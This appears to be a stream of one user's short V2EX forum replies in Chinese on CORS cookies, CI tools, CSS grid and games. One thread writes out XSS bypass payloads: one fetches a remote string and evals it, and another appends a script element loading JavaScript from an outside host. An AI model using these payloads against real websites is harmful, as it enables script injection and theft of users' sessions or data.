浏览器目前的做法就是如你所说的，所以你的疑问并不存在= =，看 MDN:

`https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CORS#%E9%99%84%E5%B8%A6%E8%BA%AB%E4%BB%BD%E5%87%AD%E8%AF%81%E7%9A%84%E8%AF%B7%E6%B1%82`

XMLHttpRequest 或 Fetch 与 CORS 的一个有趣的特性是，可以基于 HTTP cookies 和 HTTP 认证信息发送身份凭证。一般而言，对于跨源 XMLHttpRequest 或 Fetch 请求，浏览器 **不会** 发送身份凭证信息。如果要发送凭证信息，需要设置 XMLHttpRequest 的某个特殊标志位。


如果想要携带 cookies ，必须在发起请求时要求 XMLHttpRequest 或者 Fetch 携带 cookies ，并且服务器也需要允许`Access-Control-Allow-Credentials: true`，且附带 cookies 的情况下，其他跨域属性均不能为通配符，必须指定一个准确的值。

冲冲冲。

https://v2ex.com/t/824934#reply29

同样遇到一个，试试 21 楼老哥给的 Google 工具。

分子。

君子不立于危墙之下。

gitea + drone 轻量级就完事了。

老哥加油~。

https://stackoverflow.com/questions/45870323/does-css-grid-have-a-flex-grow-function

fr 和 flex-grow 是类似的，所以只要把 grid 的元素的高度撑满就可以。

@isBitter

阔怕，名将转激战还每把满转。

@isBitter

锦囊转起来。

@lhstock

解析不受控，老哥能否具体说说怎么做？

@wednesdayco

可以的，我想到的有两种：

1. fetch 一个外部字符串，然后 eval ，fetch('').then(function (val) { eval(val) })，字符串的内容就是正经插入就可以。

2. 设置了请求策略的话可以借用 window 对象，`Object.assign(window, { xss: [] })`，这样就得到了一个可以存放任意变量的`window.xss`对象，然后`window.xss.push(document.createElement('script')); window.xss[0].setAttribute('src', 'http://www.baidu.com'); document.body.appendChild(window.xss[0])`，就插入外部 js 了。

@jin5354

这还是有点不一样吧，并没有过滤<>/，script ，要是想攻击我直接插一个外部 JS 就完事了，我还用得着绕个大圈讲武德的硬写 HTML?

@learningman

哈哈哈，可惜不是刷题木有答案，就是想找这个可以转换成=的字符，知识到了边界找不到了= =。

@jin5354

这样没有达到本来的目的，这样只对我自己有效，这样搞就变成一个只能打自己的反射 XSS 了。

@mxT52CRuqR6o5

是的，还是有 XSS 风险，只是我的目的不是攻击，也没有权限改其他人的网站。

@Xusually

是= =，只是并不为了攻击。

@vanton

大佬，不在挣扎一下吗= =。